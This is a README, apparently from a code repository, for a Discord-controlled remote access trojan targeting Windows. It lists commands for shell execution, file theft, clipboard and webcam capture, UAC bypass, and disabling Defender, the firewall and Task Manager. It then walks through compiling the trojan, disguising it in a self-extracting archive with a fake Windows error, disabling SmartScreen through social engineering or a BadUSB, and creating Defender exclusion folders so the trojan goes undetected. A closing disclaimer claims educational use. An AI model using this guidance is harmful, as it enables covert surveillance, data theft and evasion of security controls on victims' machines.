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Discord RAT Windows - botConnect

This project is a Remote Administration Tool (RAT) based on Discord, which allows commands to be executed remotely on a victim machine via a Discord bot. The bot connects to a user-specified Discord server, and commands are executed via a text channel within the Discord server, making it easy to manage remotely in a controlled environment.

The bot is capable of executing custom commands prefixed with !, providing full access to the victim machine and facilitating real-time interaction. The project includes several tools to automate the creation and compilation of an executable file (EXE) that can be executed on the victim machine without raising suspicion.

Project Characteristics

The project includes the following scripts and functionalities:


  • Main Function: This script generates the connection of the Discord bot that connects to a specific server.
  • Commands:
    • !myhelp: Shows a list of available commands.
    • !geolocate: Shows the public IP address of the victim machine, plus other information about the location of said IP.
    • Additional commands: Custom commands that you can define to interact with the victim machine.

!myhelp (List)

📜 Comandos Disponibles

Comandos Generales:

  • !message = Mostrar un cuadro de mensaje con tu texto
    Sintaxis: !message ejemplo

  • !shell = Ejecutar un comando de shell
    Sintaxis: !shell whoami

  • !voice = Hacer que una voz diga en voz alta una frase personalizada
    Sintaxis: !voice prueba

  • !admincheck = Comprobar si el programa tiene privilegios de administrador

  • !cd = Cambiar de directorio

  • !dir = Mostrar todos los elementos en el directorio actual

  • !download = Descargar un archivo desde el ordenador infectado

  • !upload = Subir un archivo al ordenador infectado
    Sintaxis: !upload archivo.png (con archivo adjunto)

  • !delete = Eliminar un archivo
    Sintaxis: !delete /ruta/del/archivo.txt

  • !write = Escribir tu frase deseada en el ordenador

  • !clipboard = Recuperar el contenido del portapapeles del ordenador infectado

  • !idletime = Obtener el tiempo de inactividad de los usuarios en el ordenador objetivo

  • !datetime = Mostrar fecha y hora actuales

  • !currentdir = Mostrar el directorio actual

Escalado de Privilegios y Control del Sistema:

  • !getadmin = Solicitar privilegios de administrador a través del aviso UAC

  • !block = Bloquear el teclado y el ratón del usuario (Se requieren privilegios de administrador)

  • !unblock = Desbloquear el teclado y el ratón del usuario (Se requieren privilegios de administrador)

  • !screenshot = Tomar una captura de pantalla de la pantalla actual del usuario

  • !exit = Salir del programa

  • !kill = Matar una sesión o proceso
    Sintaxis: !kill session-3 o !kill all

  • !uacbypass = Intentar eludir UAC para obtener privilegios de administrador

  • !shutdown = Apagar el ordenador

  • !restart = Reiniciar el ordenador

  • !logoff = Cerrar sesión del usuario actual

  • !bluescreen = Provocar una pantalla azul (Se requieren privilegios de administrador)

  • !migrateprocess <process_name> = Migrar un proceso en ejecución a una nueva instancia.
    Sintaxis: !migrateprocess ejemplo.exe

Seguridad y Modificaciones del Sistema:

  • !prockill = Matar un proceso por nombre
    Sintaxis: !prockill proceso

  • !disabledefender = Deshabilitar Windows Defender (Se requieren privilegios de administrador)

  • !disablefirewall = Deshabilitar el Firewall de Windows (Se requieren privilegios de administrador)

  • !critproc = Convertir el programa en un proceso crítico (Se requieren privilegios de administrador)

  • !uncritproc = Eliminar el estado de proceso crítico (Se requieren privilegios de administrador)

  • !website = Abrir un sitio web en el ordenador infectado
    Sintaxis: !website

  • !disabletaskmgr = Deshabilitar el Administrador de Tareas (Se requieren privilegios de administrador)

  • !enabletaskmgr = Habilitar el Administrador de Tareas (Se requieren privilegios de administrador)

  • !startup = Agregar el programa al inicio

Geolocalización y Comandos Varios:

  • !geolocate = Geolocalizar el ordenador usando la latitud y longitud de la IP

  • !listprocess = Listar todos los procesos

  • !infocounts = Obtener información de las cuentas del sistema

  • !rootkit = Lanzar un rootkit (Se requieren privilegios de administrador) [No disponible]

  • !unrootkit = Eliminar el rootkit (Se requieren privilegios de administrador) [No disponible]

  • !getcams = Listar los nombres de las cámaras

  • !selectcam = Seleccionar una cámara para tomar una foto
    Sintaxis: !selectcam 1

  • !webcampic = Tomar una foto con la cámara web seleccionada

  • !myhelp = Este menú de ayuda


  • Main Function: Automates the bot configuration and compilation process into an executable .exe file.
  • Process:
    • Requests the user for the Bot Token and the Server ID (the Discord server ID).
    • Compiles the Python file ( to an EXE file that can be executed on the victim machine.


  • Main Function: Detailed instructions on how to package the .exe file with a fake_error.vbs file (which simulates a Windows error), the guide is in the script called
  • Goal: Make the .exe file go unnoticed by packaging it in a self-extracting file that simulates a Windows error.

4. ScriptSmartScreen

  • Main Function: Scripts that allow you to disable the Windows SmartScreen to prevent the executable file from blocking.
  • Includes:
    • DuckyScript: To disable SmartScreen.
    • PowerShell script: To disable SmartScreen automatically on the victim machine.


For these 2 previous scripts social engineering would be needed so that somehow the victim user executes at least the .ps1 script and thus deactivates the SmartScreen.

5. ExclusionWindowsDefender (Windows 11)

  • Main Function: Tool to prevent Windows Defender from detecting the executable file as a threat.
  • Instructions: Include a file carpetaExcluidaWindowsDefender.ps1 to create a folder excluded from Windows Defender scans, ensuring that the executable file is not detected.


For this script here, in the same way as before, some type of social engineering would have to be done so that the victim user executes said script and thus generates a folder that avoids Windows Defender where our Trojan is deposited. (In Windows 10 it is not usually detected as "Malware")


Before running this project, make sure you have the following requirements configured:

  1. Python 3.x: This project is written in Python3. You can install it from the following link:

  2. Dependencies:

    • This project requires several Python libraries that will be installed automatically via the requirements.txt file.

    To install the necessary dependencies, simply run the following command in your terminal:

    pip install -r requirements.txt

    This will install all the necessary libraries for the project to work correctly.

Project Use

1. Compiling the Bot with

The script automates the process of configuring the bot and compiling the .exe file.

Steps to run

  1. Execute the script by double-clicking on it.

    • Important: Never directly run the script, as doing so will cause the compilation process to fail. The script is responsible for correctly executing
  2. Provide bot data:

    The script will open a configuration window where you must enter the Bot Token and the Server ID:

    • Bot Token: You can obtain this token from the Discord Developer Portal.
    • Server ID: This is the ID of the Discord server that the bot will connect to. To obtain it, activate developer mode in Discord and right click on the server to copy its ID.
  3. Select the file:

    Once your bot is configured, select the file you want to use to build.

  4. Specifies the location of the compiled file:

    After selecting the file, you will be asked to choose the location where you want to save the compiled .exe file.

  5. Wait for the build to complete:

    The script will generate the .exe file that you can run on the victim machine for the bot to connect to the specified Discord server.

Practical video:


2. Bypass SmartScreen Lock

1. DuckyScript:

  • Function: Disable SmartScreen so that the .exe file does not crash when executed.
  • Usage: Simply run DuckyScript in the victim's environment to disable SmartScreen with a BadUSB. (Although this requires having the victim's PC at a physical level)

2. PowerShell script (ScriptSmartScreen folder):

  • A PowerShell script is included that disables the SmartScreen automatically.
  • Run the PowerShell script to prevent SmartScreen from blocking the execution of the generated .exe file. (This technique would require social engineering for this)

3. Bypass Windows Defender Detection (Windows 11)

In some cases, Windows Defender might detect the executable file as a threat in Windows 11. To prevent this, tools are included to exclude the executable file from Windows Defender scans.

Steps to avoid Windows Defender detection:

  1. Execute the script carpetaExcluidaWindowsDefender.ps1:

    • This script will create a folder that will be excluded from Windows Defender scans.
    • Run the script with PowerShell to ensure that the folder where you will store the EXE file is not scanned by Windows Defender.
  2. Move the .exe file to the excluded folder:

    • After running the script, move the generated .exe file to the folder that was excluded from Windows Defender scans.

4. Make the .exe File More Realistic

To make the .exe file go unnoticed, the file is included, which explains how to create a self-extractable archive with WinRAR.

Steps to package the .exe file as self-extracting:

  1. Prepare the generated .exe file and the fake_error.vbs file (which simulates a Windows error).
  2. Use WinRAR to package both files into a self-extracting archive.
  3. The self-extracting file will run and simulate a Windows error, making the bot go unnoticed.

Practical video:


5. Discord Bot Settings

To configure the Discord bot:

  1. Run the DiscordBotPage.bat file to be redirected to the bot configuration page in the Discord Developer Portal.
  2. Follow the steps on the page to configure the Bot Token and obtain the necessary permissions for the bot on your server.

Warning and Responsible Use

This project is intended for educational purposes and for penetration testing in controlled environments. Do not use this project without the explicit consent of the owner of the system you are controlling. Unauthorized use of these types of tools is illegal and against Discord's terms of service, as well as local laws and regulations. international.

This project should not be used for malicious activities or to compromise systems without the consent of the parties involved.


If you would like to contribute to the project, please open a pull request or report any issues in the issues section of this repository.